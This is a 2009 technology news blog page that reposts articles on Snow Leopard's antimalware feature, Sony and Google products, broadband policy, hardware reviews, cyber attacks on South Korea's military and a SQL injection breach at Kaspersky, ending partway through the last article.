Welcome to Cyber Way

A Platform to Search Knowledge, Education, Fun, and Explore Cyber World.

Google Search

Custom Search

Thursday, August 27, 2009

Snow Leopard to Prowl for Mac Malware?



Apple has reportedly built antimalware features into its upcoming Snow Leopard operating system. The feature apparently patrols for known Mac Trojans. Tight security is an oft-touted feature of Mac OS X, though users must still be wary of malware like Mac Trojans, which have been known to exist in the wild.
Apple (Nasdaq: AAPL) has reportedly included antimalware technologies in Snow Leopard, which will go on sale Friday.
The news comes shortly after Apple released a fresh round of commercials indicating that the Mac, unlike PCs running Windows, is virus-free.
Mac security software vendor Intego's blog carried a screenshot showing the antimalware feature detecting a version of the RSPlug Trojan horse in a downloaded disk image.
Dan Goodin, writing in the Register blog, said the feature checks for only two known Mac Trojans, and has other limitations.

About the Antimalware
Intego said it's not sure how the antimalware feature works. It promised to post more information on its blog when it finds out.
Quoting someone who has tested the feature and requested anonymity because of the restrictions of a non-disclosure agreement (NDA), Goodin said a pop-up window warns users when they try to install applications that are malicious.
The feature apparently only detects two known Mac Trojans, RSPlug and iServices. Further, it flags them only if they were downloaded from the Internet using Entourage, iChat, Safari, Mail, Firefox and Thunderbird, Goodin's source said.
The feature does not detect malicious files downloaded using Skype and other Internet-facing applications, or files on DVDs and thumb drives, Goodin's source told him.
Does Apple Security Work?
On its Web site, Apple claims that Mac OS X delivers "the highest level of security through the adoption of industry standards, open software development and wise architectural decisions." This intelligent design prevents the viruses and spyware that sometimes plague PC users, it says.
Features include secure default configuration; a personal firewall; auto updates; encryption through the FileVault feature, which uses AES-128 encryption; and disk image encryption.
However, none of that impresses Charlie Miller, principal analyst of software security at Independent Security Evaluators.
"Apple security's mostly worse than Windows Vista because it doesn't have full ASLR and DEP," he told MacNewsWorld. "We'll have to wait for Snow Leopard to see if it adds these features. If it does, it is at least comparable to Vista."
Let's Get All Technical
ASLR, or address space randomization layout, involves randomly arranging the positions of key data areas, including the base of the executable and the positions of libraries, heaps and stacks, in a process's address space. This prevents an attacker from easily predicting target addresses.
DEP, or data execution prevention, is a security feature that was introduced in Microsoft (Nasdaq: MSFT) Windows XP Service Pack 2. It prevents an application or service from executing code from a non-executable memory region. This helps prevent exploits that store code through a buffer overflow.
Windows XP Tablet PC Edition 2005, Windows Server 2003 SP 1, Windows Vista, Windows Server 2008, and all newer versions of Windows include DEP.
"We wonder just how serious Apple thinks the malware threat is, especially since their latest Get a Mac ads highlight the fact that PCs running Windows suffer from viruses," Intego said.
Since leaving the National Security Agency, Miller has made a career out of cracking Apple's security. At the Black Hat 2009 security conference, he demonstrated that hackers can break into iPhones through the SMS protocol. Apple later issued a patch it said fixed the problem. He also hacked a Mac in about 10 seconds at CanSecWest 2009 in Vancouver, Canada, in March.
Both Intego and Miller have seen a pre-release copy of Snow Leopard but cannot comment, because they're under NDA until Friday, when Snow Leopard hits the shelves.
Ducking the Malware Firestorm
Apple has had to issue two security updates for Leopard, Snow Leopard's predecessor, this year.
However, Cupertino has been able to avoid major security problems because it has a relatively small share of the personal computing market, said Miller.
"If 90 percent of the world runs Windows, and I'm a bad guy who wants to make money with botnets and such, I'll spend 100 percent of my time on Windows since I can make the most money that way," Miller explained.
"So far, Apple has been able to achieve excellent security by obscurity," Laura DiDio, principal at ITIC, told MacNewsWorld. "It's not that Microsoft has poor security, it's just that, if you are the largest target out there and people keep pounding on you, sooner or later they'll get through."
If the reports that Apple has included an antimalware feature in Snow Leopard are correct, it's a smart move, DiDio said.
"Besides being a good tactical move from the technology standpoint, it's a good public relations move to show industry watchers, customers and resellers Apple's taking charge, it's being proactive and not letting the issue get ahead of it," she said.

Sony Burns Kindle With New Wireless Touchscreen E-Reader


Sony has shown off its answer to Amazon's Kindle e-reader: The Daily Edition, a device that features similar wireless download capabilities but also sports a touchscreen interface. Wireless support comes from AT&T. Sony says the reader won't be ready until December, so a holiday e-book brawl may be brewing.



If you are able to read one of novelist Patrick O'Brien's rousing naval adventures on Sony's (NYSE: SNE) new Daily Edition electronic book reader, then you will also participate in helping Sony send its own shot across the bow at Amazon (Nasdaq: AMZN) and its popular Kindle reading device.

Sony announced Tuesday that the Daily Edition reader will sell for US$399 and will be available in December, just in time for holiday shopping sprees. The real news, however, focused on the Daily Edition's wireless capabilities. Just as with the Kindle's Whispernet technology, the Sony device will allow for instant downloads of books no matter where the user is, thanks to back end infrastructure provided by AT&T (NYSE: T) .
The Daily Edition also offers touchscreen capabilities, which lets users highlight words and paragraphs, and will allow consumers to "check out" books from libraries nationwide thanks to a partnership with OverDrive. The latter feature helps shore up a previous weakness with Sony's reading devices compared to Amazon's Kindle -- the sheer number of books available for download.

Look, Ma, No USB Cables
"Amazon set the standard in being able to integrate wireless," Gerry Purdy, chief analyst of mobile and wireless for Frost and Sullivan, told TechNewsWorld. "It isn't that just adding wireless makes it important, but what it enables is important. It's that the bookstore goes along with you as you're out and about. Before, you had to be connected to a PC to download stuff to your Reader, but now if somebody tells you about a book or you see a book, you can download it right then and there. It's a much better user experience."
However, the pressure is on for AT&T to deliver the same kind of seamless integration with wireless book downloads that has brought Amazon's Kindle so many critical kudos. The embedded wireless/emerging products group at AT&T now has until December to deliver on that promise, Purdy said. "AT&T has a heck of a high brand value and more quality and delivery to make that happen. You'll see a lot more deals like this. I would expect you're going to find it works like Whispernet."
Purdy sees an advantage to the AT&T connections, that being the global nature of the carrier's GSM network. U.S. buyers who do a lot of traveling might end up doing a lot of overseas downloading of books as well.


Reading at Your Fingertips
The touchscreen is another potential key differentiator for Sony's Daily Edition. "Quickly being able to highlight a word and look up a definition or synonym is a lot easier than going to a menu. There are a number of things you have to do on a Kindle to do that. Yes it works, but touch is important. If I was giving feedback to Amazon, I'd like to see touch added to their capabilities," Purdy said.
Of course, if a rumored forthcoming Apple (Nasdaq: AAPL) tablet offers color and graphics support to any electronic book-reading features, that could add a whole new chapter to the e-book competition story. Color screens may be battery hogs, but they also provide better contrast ratios for reading, Purdy said. "As soon as you add color and media, then textbooks become viable. They need color and symbols. It's not easy to publish graphics, and you can't make them move on a Kindle. The days of kids with backpacks full of books may become numbered" with a color reader on the market, he added.

Google Maps Adds Back-Road Traffic Flow Data

Google has expanded the functionality of its Maps application to provide information on traffic congestion -- or the lack of it -- on surface streets. It previously was limited to interstate highways. Since the system relies in part on data culled from GPS chips in users' phones, its accuracy in less-populated areas is questionable. Then again, a lack of data may indicate light traffic.
Google (Nasdaq: GOOG) has pushed an update to its Maps application adding traffic data on surface streets.
The data will be drawn from GPS-enabled cellphones that are actively running the mobile version of Google's map app, the company said in a blog posting Tuesday.
Although all users of Google's mobile maps service appear to have access to the traffic data, only users with GPS-equipped phones with Google Maps installed can contribute speed information. The iPhone's built-in map application does not support the crowdsourcing feature, according to Google.
The company had previously restricted traffic data to interstate routes, and at least some of that data was provided by traffic services, according to media reports.
It's unclear if Google was using crowdsourcing to help generate its interstate reports, if it is still using those services and, if so, if reports from traffic services play into the descriptions of side-street traffic.
Google's media relations office did not respond to a request for comment on the new service by this article's deadline.

No News Is Good News?
The updated service works by sending Google anonymous information collected by a user's cellphone GPS chip on how fast the car it's in is moving.
Google's service will likely run into the same sort of problem other traffic services get into when they try to predict speeds away from the mad crush of traffic, on quiet secondary and side streets where few drivers are likely to be motoring with their cellphones flipped open to Google maps, said Chris Hazelton, research director for mobile and wireless at the 451 Group.
"That's when you get into samples of one or two people," Hazelton told TechNewsWorld. "How do they know if I'm parking or sitting in traffic?"
Google seems to be satisfied with how well the service is likely to work despite the potential of a small number of users, noted Carl Howe, an analyst with the Yankee Group.
"The question is how many will actually have connected cellphones with GPS applications on them running all the time," Howe told TechNewsWorld. "Google asserts, though, that there are enough that they're getting good data."
The number of cellphones equipped with GPS is large, but it's not clear exactly how many of those phones allow applications to access data from their chips. Regardless, GPS in cellphones is in big demand among consumers and will become increasingly prevalent in the coming years, said Allen Nogee, a principal at In-Stat.

More Than a Convenience
Crowdsourcing is not entirely new in traffic circles. Some private and governmental traffic services already use data sent out by cellphones as they hand off from tower to tower to calculate speeds on nearby roads.
The service could do more than help drivers get to their destinations faster, said Google Maps Product Manager Dave Barth in a company blog posting. It could, in fact, help the environment and assist governments in making transportation planning decisions.
Google says it is mindful of privacy concerns associated with the service, and it has taken steps to make sure that only anonymous data is collected and trip information is discarded

Tuesday, August 11, 2009

U.S. government will not get secret company Internet data

WASHINGTON (Reuters) - Telecommunications providers will not have to give the government sensitive revenue and Internet speed data for a program to map broadband use in U.S. homes and bring high-speed Internet service to more people.
The U.S. Commerce Department said on Friday that companies such as Verizon Communications Inc, Comcast Corp and AT&T Inc do not have to share how much money they make from each Internet subscriber. Nor must they say how fast their Internet connections typically run.
Instead, they will provide data by the block, usually about a dozen homes depending on the size of the block. They also will share the speed of Internet service that they advertise.
Companies do not want to share the specific data because they do not want their competitors to see it.
But failing to make it public allows the companies to advertise -- and charge for -- something that they often cannot deliver, said Joel Kelsey, a telecom policy analyst at Consumers Union, a watchdog group.
"The actual speeds delivered to particular areas simply doesn't match up," Kelsey said. "The government gave a lot and received very, very little in return."
Companies that sell Internet service advertise maximum service speeds as a way to entice customers. More speed means faster access to online entertainment and information.
Internet connections can work at slower speeds than the maximum speed advertised, especially when many subscribers are online at the same time.
The American Cable Association and other groups representing the companies opposed some of the rules before the government clarified the data policy.
"The agency's modifications will improve and expedite (the mapping) effort," ACA President Matthew Polka said.
Larry Landis, an Indiana utility regulatory commissioner and chairman of the federal-state group that will map high-speed Internet availability, praised the Commerce Department's National Telecommunications and Information Administration for being flexible.
The Commerce and Agriculture departments will award loans and grants to state and local governments, and nonprofit and for-profit companies, including telecommunications companies, to participate in the government's broadband program.
The first phase of the plan would release $4 billion of the $7.2 billion program included in President Barack Obama's economic stimulus plan. About $350 million will go to the mapping program, but the Commerce Department estimated that $240 million would be needed.
The rule changes come a day after the Federal Communications Commission launched its first workshop to gather ideas and proposals for a national broadband plan it plans to give to Congress in February.

Three top Hollywood studios bring films to Web

NEW YORK/LOS ANGELES (Reuters) - It is a dash of Hulu and a sprinkle of YouTube, features a crystal clear picture, can rewind or fast-forward at lightning speed, and doesn't require a download of any special software.
But epixHD.com, the soon-to-launch video website, will have its success dictated more by the movies, concerts and original programs it offers than the technology behind it, said the executive charged with creating and running the site.
"The critical linchpin to what we've got is that we have one-third of the box office of Hollywood," Epix Chief Digital Officer Emil Rensing said in an interview.
That comes thanks to the three parent companies of Epix: Viacom Inc's Paramount film studio, Lions Gate Entertainment Corp and MGM. In putting together Epix, the companies hope to compete with Time Warner Inc's HBO and CBS Corp's Showtime in the premium movie channel business.
But they added a twist. In addition to the premium movie channel and a video-on-demand component, the venture is building epixHD.com, a website where the studios' vast collections of full-length movies and new original programing can be streamed by any subscriber.
Rensing, a former executive with Time Warner's AOL, was hired to run the site. His aim, he said in an interview, was to make it "all about being easy to use" yet not a "dumb player" that simply acts as a projection screen for video.
So epixHD.com comes with an array of features. When watching Paramount's "Iron Man," for instance, a person will have access to the trailer, lists of facts about the superhero film, a plot synopsis, and cast list.
Because of its relationship with the studios, Rensing said epixHD.com could eventually offer more unique features.
"Let's give something to the fans that gets them really excited," said Rensing. "We're asking (the studios) for some of the weird stuff. We'd like to go to sets on tear down days, talk to the teamsters about the crazy stuff that happened."
BUILDING ITS LIBRARY
EpixHD.com is due to launch before the cable channel does in October, and will build its library of films from its parent studios in the months that follow. At the moment, it is still being tested in front of a small audience.
As for its appearance, the site features as wall of movies from which a viewer chooses with a click of the mouse. The movie then pops up, set against a traditional red movie theater curtain. Another mouse click plays the movie.
"My job is not to convince people to watch movies on the Internet. I already know they are doing that. What's my job? My job is to make it as easy and fun as possible to watch the stuff that I have access to," said Rensing.
"We're not a tech company, we're a media company," he said in response to a question about some similarities to Google Inc's YouTube or Hulu, owned by General Electric Co's NBC Universal, News Corp, and Walt Disney.
"I'm not going to reinvent the wheel. Hulu's got a great player. I'm going to take a couple things from Hulu. YouTube's got a couple cool features. I'm going to take them."

Facebook buys social media start-up FriendFeed

SAN FRANCISCO (Reuters) - Facebook, the world's largest social networking site, said it will buy FriendFeed, netting a group of prized ex-Google engineers in the fast-growing Internet business.
FriendFeed, an up-and-coming social media startup, lets people share content online in real time across various social networks and blogs.
The service is similar to, though less popular than Twitter, the microblogging site that Facebook tried to buy for $500 million in 2008, according to sources familiar with the matter.
Terms of the deal were not disclosed on Monday, but Facebook said FriendFeed would operate as it has for the time being as the teams determine long-term plans.
Facebook's big gain in the acquisition is the engineering talent at FriendFeed, rather than the actual product, which has won critical praise, but lagged in popularity compared to Twitter, said Forrester Research analyst Jeremiah Owyang.
"These guys now how to build scalable, social applications," said Owyang.
In a statement, Facebook CEO Mark Zuckerberg said he admired the FriendFeed team for having created a service he described as simple and elegant.
"As this shows, our culture continues to make Facebook a place where the best engineers come to build things quickly that lots of people will use," said Zuckerberg.
FriendFeed's four founders are former Google Inc employees who count well known products like Gmail and Google Maps among their accomplishments.
Facebook said the founders will hold senior roles on its engineering and product teams.
FriendFeed had talked with Facebook "casually" for a couple of months, and that it became clear that the teams were "cut from the same cloths," FriendFeed co-founder Bret Taylor told Reuters in an interview.
He declined to say whether FriendFeed had been in talks with other companies.
One bridge between Facebook and FriendFeed might have been Matt Cohler, Facebook's former management vice president. He joined FriendFeed backer Benchmark Capital last year.
Asked what role the connection played in the deal, FriendFeed's Taylor said the decision to be acquired by Facebook was made entirely by the team at FriendFeed.
Facebook has more than 250 million registered users. In May, the social networking company announced a $200 million investment from Russian investor Digital Sky Technologies that pegged the value of its preferred shares at $10 billion.

Tuesday, June 16, 2009

Core i7-975 Extreme Details

The Core i7 vital stats you already know apply here, just as they have since the architecture launched last year. Manufactured on Intel’s now-mature 45nm process, a single Core i7 die populates 263 square millimeters.









Natively quad-core in that the processor doesn’t consist of two dual-core die on a single multi-chip module (like Core 2 Quad), Core i7 also includes Hyper-Threading technology. The result is a micro-architecture with four physical execution cores able to concurrently work on eight threads. As a result of the efforts expended by software developers to better-optimize relevant code for parallelism, this results in a performance win more often now than it did back when Hyper-Threading first emerged in the Pentium 4 days.
Cache sizes remain the same (32 KB L1 I/32 KB L1 D and 256 KB L2 per core, plus 8 MB shared L3), and the integrated triple-channel memory controller is still officially limited to DDR3-1066. But of course, as we’ve discovered, retail CPUs support the multipliers necessary to reach as far as DDR3-2133. We have heard from one memory vendor that the controller itself has been improved, but without any additional information from Intel regarding how it might have been tweaked, we can’t confirm those rumors at this time. We can say that DDR3-2133 is now within reach, though it takes some serious tuning to stabilize at that data rate.
As with the i7-965 Extreme, the 975 boasts a 6.4 GT/s QPI link, while the i7-950 employs a 4.8 GT/s link. Of course, if you’re running a retail processor (and not an engineering sample, like the one used in our original Core i7 launch coverage), you should be able to manually tune QPI speed up to 6.4 GT/s in your motherboard’s BIOS.

We asked Intel about the i7-975's Turbo bin configuration and were told that it is exactly the same as the i7-965 before it. That is to say, when 1, 2, 3, or 4 cores are active, you get 2, 1, 1, and 1 available bin (a bin being 133 MHz). Curious as to how much time our 975 Extreme would spend at 3.6 GHz, we ran a single thread of Prime95 to tax an individual core. Interestingly enough, you spend a lot of time waiting for that 27x multiplier to kick in (up from 25x), and it doesn't last very long. You see, there's always something else going on in the background, and if there isn't a significant load being applied to at least one thread, SpeedStep is throttling you back the other way. Expect most of your load time to be spent at 3.46 GHz with Turbo mode enabled. Otherwise, turn the feature off completely and overclock manually.
As a result, we have to wonder how much benefit upcoming architectures will see from Turbo with a single core active.

Hard Drives, Yesterday And Today: From 500 GB To 1.5 TB


Hard drives have now reached the 2,000 GB (2 TB) capacity level, and performance has been steadily going up as well. Hard drive makers have finally incorporated power consumption into their design decisions, making modern hard drives not only bigger and faster, but also more efficient when looked at either from a performance per watt or capacity per watt standpoint.
We took the last three Samsung desktop hard drive product generations and compared their top models to analyze how much progress has been made in the hard drive space.

Hard Drives Versus Solid State Drives
The most recent solid state drives, which are referred to as flash SSDs, have reached capacities of up to 256 GB, and their performance often exceeds 200 MB/s with extremely short latencies. However, only a few of them are truly worth the several hundred dollar investment they demand, as flash SSDs require intelligent, multi-channel configurations with smart controllers and cache memory. The cache is required to enable command queuing, in an effort to maximize wear leveling and performance with changing performance loads. But we’ll stop talking about flash storage, as it is only interesting in the very high-end and the very low-end. Hard drives will continue to dominate the storage market for several years.
Capacities of up to 2 TB cannot yet be realized on flash memory; and if it were possible, it would cost thousands. The cost advantage in the mainstream is even more significant, as terabyte hard drives are available at only $100, while you have to spend three times as much for only 10-20% of the capacity on flash SSDs. And finally, the flash market could not even supply sufficient flash memory to saturate the storage demands of today (and tomorrow).

Samsung: From 0-60 Within A Few Product Generations
Most people don’t think about Samsung when they talk about hard drives, but the Korean company has managed to become an important player, next to Seagate, Hitachi, and Western Digital. The Japanese companies Fujitsu and Toshiba are still pretty active, but they mainly focus on notebook drives (Fujitsu, Toshiba) or server hard drives (Fujitsu). The latter also applies to Seagate and Hitachi. Samsung and WD have server offerings, but their product lines are limited.


Desktop Hard Drive Analysis
We will look at some notebook hard drives in a future article, as these HDD types will dominate the storage market in coming years, due to the shift from stationary to mobile computing. Today we’ll look at three hard drive generations by Samsung: the Spinpoint T166 at 500 GB, the Spinpoint F1 EcoGreen 1000 GB, and the Spinpoint F2 EcoGreen 1500 GB. These represent Samsung’s last three product lines, and they serve as perfect examples to pinpoint where storage is heading.

SKorea military networks under growing cyber attack

South Korea's military computer networks are under ever-growing cyber attack with 95,000 cases reported daily on average, officials said Tuesday.
The Defence Security Command said in a report to a security forum that every day the military counters an average of 10,450 hacking attempts and 81,700 computer virus infections in addition to other cases.
The attacks increased 20 percent this year compared to 2008, it said.
A spokesman for the command told AFP most of the attacks are the same as ordinary people experience at home, but one-tenth are serious.
"Eleven percent of the total are sophisticated and vicious attempts to hack into military servers and to gather intelligence," the spokesman said.
The command did not elaborate where the originated. Defence officials in Seoul have previously pointed to North Korea and China, which they say run elite hacker units.
Yoo Ho-Jin, an official of the National Intelligence Service, said his agency recently proposed that the president name an aide to deal with cyber-security.
"Our country continues to be vulnerable. Some of our government branches failed to function when we recently simulated a cyber-attack on them," Yoo told a security forum on Tuesday, according to Yonhap news agency.
"This is a grave threat to our national security."
South Korea and the United States in April agreed to cooperate to defend their defence networks from countries including China and North Korea.
Last year South Korean Prime Minister Han Seung-Soo warned his cabinet against what he called attempts by Chinese and North Korean computer hackers to obtain state secrets.

Wednesday, June 3, 2009

The WAN Traffic Controller Juggling Act

Boosting the speed of wide area network application delivery by directing traffic through multiple network paths is a little like running an airport with multiple runways. The more runways, the less congestion. However, both scenarios require someone to direct traffic. Efficient WAN directing devices put you in the control tower.
The Internet has become a critical component in today's fast-moving business environment and continues to play a central role in delivering mission-critical business applications and vital communications to employees, partners and customers. The Internet holds the promise for organizations to streamline operations, improve operational efficiencies and lower costs. As a result, businesses have come to rely on networked applications delivered over the Internet for day-to-day operations and as a means for gaining competitive advantage.
Because of the many possibilities for improving business operations, IT personnel are placing increased attention on application service delivery and the increasing role that their organization's WAN (wide area network) plays within the application delivery ecosystem. The WAN is a critical component of today's business infrastructure. However, the WAN is independent of the business, being under the control of the telco and Internet service provider (ISP), which is an important issue that all businesses that rely on the Internet need to address.
The high value that WANs possess is a direct result of the consolidation of the data center, the centralization of user applications, increasing mobility of employees, the need for business continuity, and the addition of IP (Internet protocol)-enabled applications such as VoIP (voice over Internet protocol) and CRM (customer relationship management).

WAN Link Controllers Give Businesses Control Over the WAN
By routing traffic over multiple service provider links, WAN link controllers create a redundant WAN architecture that provides reliable network uptime while directly impacting the performance of applications over the Internet. This improvement is enhanced by capabilities such as link load balancing and failover and the ability to shape bandwidth for specific applications. Integrated firewall, VPN (virtual private network) and denial of service (DoS) security also help to ensure that the associated reliability and performance gains do not get thwarted by security attacks.
WAN scalability and cost reductions are realized by the ability to have complete freedom of choice for ISP/telco connectivity, allowing network designers and administrators to deploy a variety of cost-efficient bandwidth options such as T1, cable, wireless, DSL (digital subscriber line), etc. The simplicity of adding and removing WAN links and service providers and the efficient use of existing connectivity resources through link load-balancing and bandwidth management techniques makes WAN link controllers so valuable. Additionally, these products are far more cost-effective and simple to deploy than trying to use Border Gateway Protocol (BGP) for bi-directional link load balancing.
Multimedia and other bandwidth-hungry applications that performed well over a local area network (1 Gbps) with ample capacity are being challenged to provide the same level of WAN performance over a T1 link (1.45 Mbps) or DSL link (500 Kbps). This is especially true when the WAN is bottlenecked, and as more applications such as streaming video and VoIP get deployed over the same WAN link. SMEs (small to medium enterprises) need a way to optimize bandwidth in order to meet traffic requirements and improve traffic flows.
Today, the majority of articles written about WAN optimization tend to focus on technologies such as caching, compression and protocol acceleration. However, even with all the compression, caching and protocol acceleration money can buy, if the WAN link that the applications are running over fails, the applications will not get delivered -- period. In today's dynamic business environment, IT personnel need to have a network infrastructure that is redundant, flexible, scalable and can apply appropriate levels of bandwidth to specific applications running over the WAN.
Boosting the speed of WAN application delivery by directing traffic through multiple network paths is surprisingly straightforward. Using an airport analogy, adding a second runway can significantly improve traffic flow from such causes as airplane breakdowns, congestion and poor weather conditions. Similarly, the effectiveness of the multiple-path approach for WAN connectivity depends greatly on the traffic directing devices (i.e. WAN link controllers) and their ability to efficiently and accurately detect network congestion, make routing decisions to circumvent bottlenecks and prioritize applications with bandwidth guarantees. This needs to be accomplished in a manner that is relevant to the specific types of traffic payload being routed. For example, with VoIP traffic, a high-latency network path should be avoided; or for large file transfers, a low-bandwidth path should be avoided.
QoS Prioritizes WAN Connection Bandwidth for Mission-Critical Applications
Many WAN link controllers include the ability to manage applications over the WAN using traffic shaping and quality of service rules, allowing administrators to define traffic and application limits and enable application queuing to prioritize different traffic types. This allows greater control of available bandwidth so that high-priority applications such as VoIP are allocated the bandwidth they require for optimal delivery over the WAN. Bandwidth usage can be managed based upon business policies that are associated with specific mission-critical applications in order to avoid bandwidth contention.
In the first example here, an Internet-based business has two ISP connections using BGP for high availability. Its primary applications are VoIP and email. The applications run smoothly when the primary ISP connection is available. However, when that connection fails, the second ISP connection handles all the traffic, and the VoIP application utilizes most l of the available bandwidth, depriving the email application of bandwidth. This causes a business disruption, as a significant amount of their business is conducted via email, which dramatically impacts productivity and business communication.

In the second example below, the WAN link controller uses QoS to prioritize the VoIP and email applications when the ISP connection is restored. By dedicating bandwidth for each application, the WAN link controller ensures that the applications will have bandwidth allotted to them, enabling each to have the bandwidth they need for optimal service delivery.
WAN Link Controllers Put You in Control
By moving intelligent switching functionality to the edge of an enterprise network, WAN link controllers provide administrators with a new level of control. Administrators can dynamically direct traffic based on service provider availability, line capacity, performance and other policies.
WAN link controllers are deployed in-line between gateway routers and firewalls. To monitor WAN connectivity status, they perform transparent health and performance checks to evaluate the quality and reliability for each ISP link. Using this information, the WAN link controller intercepts traffic flowing in and out of the LAN and automatically switches users to the optimal WAN links.
Where traffic is sent is determined via advanced algorithms that take into account elements such as bandwidth utilization and other criteria, including what an organization pays for each ISP link. Administrators can set these policies to define how traffic should be directed to service provider links in order to best leverage its bandwidth investments. The WAN link controller prioritizes traffic to achieve optimal application delivery. For example, the IT department can make decisions whether to prevent (or limit) the download of YouTube content and other non-business related Internet browsing on the WAN network during business hours. Or they can set up higher bandwidth priorities for mission-critical applications such as VoIP. As applications such as VoIP continue to grow, the need to optimize and efficiently manage them over WAN networks becomes critical. To that end, the WAN link controller allows administrators to optimize VoIP transmission by routing VoIP application usage based on IP address, traffic type, user address, etc. For example, all the VoIP traffic can be allocated on a single line and have a second line allocated to aggregate the combined bandwidth in order to accommodate the traffic load.

Microsoft at E3: Look, Nintendo, No Controllers!


Microsoft wowed the E3 video game convention with a demonstration of Project Natal, a motion-sensing Xbox technology in development. With Nintendo's popular Wii, players use a handheld wand; however, Natal uses cameras to sense a player's full body movements. Despite the riveting demo, Natal is still unproven in terms of its actual gaming performance, and release timing is up in the air.

Microsoft is controlling the early buzz at the massive E3 video game convention with its Project Natal technology, which allows gamers to interact with their Xbox 360s without the need for handheld controllers.
Along with the publicity, though, the company is creating a lot of questions regarding its ability to deliver on the innovation and promise demonstrated on a Los Angeles Convention Center stage Monday.

It made sense for Microsoft to invite Steven Spielberg to help introduce Natal to the throng of media and industry insiders in the audience. Natal uses a full-body motion capture camera along with voice and facial recognition technology to let users do their best impressions of Tom Cruise's character from Spielberg's 2002 science fiction opus "Minority Report." Like Cruise, Natal players will use their movements and their voices to interact with games and, as Spielberg hinted, possibly other forms of entertainment.
Natal demonstration videos now on the Web feature a family member pretending to hold a race car's steering wheel from her living room couch while zooming along a Formula One course in a game; another gets martial arts lessons from an in-game teacher who follows a teenage boy's movements as he paces the floor; that boy's little brother later controls a Godzilla-like monster on the screen. The parents are seen using hand gestures to pick their movie choices from an Xbox Live catalog.

The Big Questions
All of this is the stuff that a gamer and a first adopter's dreams are made of, naturally. So when can you buy it and how much will it cost? Will the games featured in the demonstration be available, and so on?
Microsoft had no answers to any of these questions, but there are plenty of unofficial efforts to fill in the blanks. Microsoft executives did say that the software development kit for Natal is now available for third-party game developers.
Given the long lead time required to bring games to market, it's unlikely that Redmond will be giving a Christmas present to the gaming industry this year, said Directions on Microsoft vice president Matt Rosoff. A pre-holiday release "could be interesting and could spur game sales and keep console sales strong," Rosoff told TechNewsWorld, "but if it waits another year, we'll have to see if the buzz dies down."
If Natal were to come out before the end of 2009, the games available would all have to be from Microsoft studios, Rosoff speculated, as third-party developers would need more time to build games based on the new technology -- and Microsoft would want a lot of consumer choices available at launch.
Demo Is One Thing, but What About the Living Room?
Natal looked great in the E3 demonstration and on the video presentations, Rosoff acknowledged, "but of course, we're going to have to see how it works in the real-world environment. They are camera-based sensors, so light and the amount of light in your room might be an issue. It's just one of those products that until you start to see some hands-on reviews, it's going to be hard to know whether it works as advertised."
Natal is a good answer to the Wii-mote, which has helped Nintendo vault back to the top of the video game industry, said Rosoff. However, Xbox has come a long way from the 2001 introduction of its original console, and now its 360 version has reached a solid No. 2 position in terms of sales, ahead of former leader Sony (NYSE: SNE) and its PlayStation 3.
"I think all three companies want to keep this generation of consoles around for a while, so there should be no new consoles or arms race. The competition will be in services and peripherals," Rosoff predicted.

Tuesday, May 26, 2009

Inside Dell's command center

If there’s a hurricane forming in the Caribbean, a major freeway closure in Los Angeles or flight delays out of Chicago, chances are that Jason Allen knows about it.

Allen is in charge of Dell’s five worldwide Global Command Centers, around-the-clock operational centers where technicians are constantly monitoring things like flight delays, traffic jams, weather conditions or even a special event that might impact the company’s ability to handle a support call.

Allen gave me a tour of the facility during a day-long visit this week to the company’s main campus just outside Austin, Texas. As I met with folks throughout the day, there was one thing I continued to hear: tech companies today have very similar offerings from a technology and equipment perspective these days. It takes something different – like a global command center to make sure that service contracts are upheld – to make a company stand out against its competitors.

When customers rely on Dell’s servers and other equipment to keep their data centers running or their e-commerce sites powered, they need quick results from Dell’s service teams when problems arise, Allen said. The last thing a customer wants to hear is that a part is out of stock or that flight delays out of Chicago will delay delivery of replacement equipment. His team is constantly playing a game of chess - managing vendors, parts deliveries, technician dispatches and more - to make sure that these sort of problems don’t get in the way of solving the customer’s problem.

The command centers are quite a sight to see. They are rows of workstations, set in a stadium setting so that everyone has a clear line of sight to a wall full of screens. Live broadcasts of the Weather Channel and CNN play on some of them. Another has Google Earth fired up, offering overlays of everything from traffic conditions heading to Los Angeles International Airport to the path of a Hurricane barreling its way up the East coast and the times until it hits. (see map image) Other screens offer big-picture or detailed looks at the current support tickets.

On any given day, anything can happen to spark a flurry of activity in the command center. But in most cases, the work being done from the center is proactive, not reactive. Say, for example, the President will be attending a fundraiser in downtown Indianapolis. From a security standpoint, that’s an event that will likely result in road closures and traffic disruptions – something that could keep the UPS driver from reaching a Dell customer.

Armed with that sort of information, technicians in the center can reach out to those customers, inform them of the upcoming event and develop a contingency plan in the event that the customer encounters any problems during that time.

“When service goes down and it’s affecting people, we use every tool to get the problem fixed as fast as possible,” Allen said. “There’s no room for error.”

(Jason Allen, Operations Manager of the Global Command Center, points out details from a customer support ticket being reviewed by technicians.)

First look: Google Chrome 2.0 - Fast but lacking features

Google has released Chrome 2.0. The speed-demon browser gets an additional kick of speed, a few more features, and a load of bug fixes.

First, let’s look at the speed side of things. Google’s Chrome browser was already fast, but the 2.0 update loads JavaScript-heavy web pages about 30% faster than version 1.0. Benchmark tests I’ve run seems to suggest that this claim holds true, and in fact when version 2.0 is compared against version 1.0 using Google’s V8 benchmark, the newer browser is twice as fast.
So, there’s plenty of speed available. But what about features?

Well, for those who like an all-singing, all-dancing browser, Google’s Chrome as always been a poor choice because while the browser packed plenty of power, it was very basic. Chrome 2.0 is no different.

Here are some of the most significant newly added features to Chrome 2.0:

  • Ability to delete thumbnails from new tab page
  • Full page zoom
  • Full screen mode (by pressing F11)
  • Autofill for web forms

Nothing to write home about! Still, I use Chrome regularly because I like the speed and love the stability.

Then there are the bug fixes. More than 300 of them according to Google.

If you are a Chrome user, the browser will automatically update when run. If not, head over to the Google Chrome download page.

For Mac and Linux users, there’s still no Google Chrome for you.

Saturday, May 23, 2009

Kaspersky Red-Faced Over SQL Injection Hack

A group of hackers who were apparently not advanced enough to take full advantage of their mischief nevertheless managed to embarrass security firm Kaspersky. They may have been looking to build their hacker creds when they breached a database under the firm's protection by taking advantage of a SQL injection vulnerability.

A team of hackers exploited a SQL injection vulnerability to gain access to a customer database protected by security company Kaspersky. It appears the attack did not compromise any data, according to Roel Schouwenberg, a Kaspersky senior antivirus researcher. However, it certainly dealt a blow to the company's reputation.
"A Romanian hacker team found a vulnerability in a new site we launched in the U.S.," Schouwenberg told TechNewsWorld. "That vulnerability allowed them to to get some access to that part of the site. Fortunately, no data has been compromised -- but if the hackers had been more advanced, they could have gotten access to 2,500 email addresses and activation codes for new products."
The hackers' motives for carrying it out the attack are unclear.
Insufficient Notice
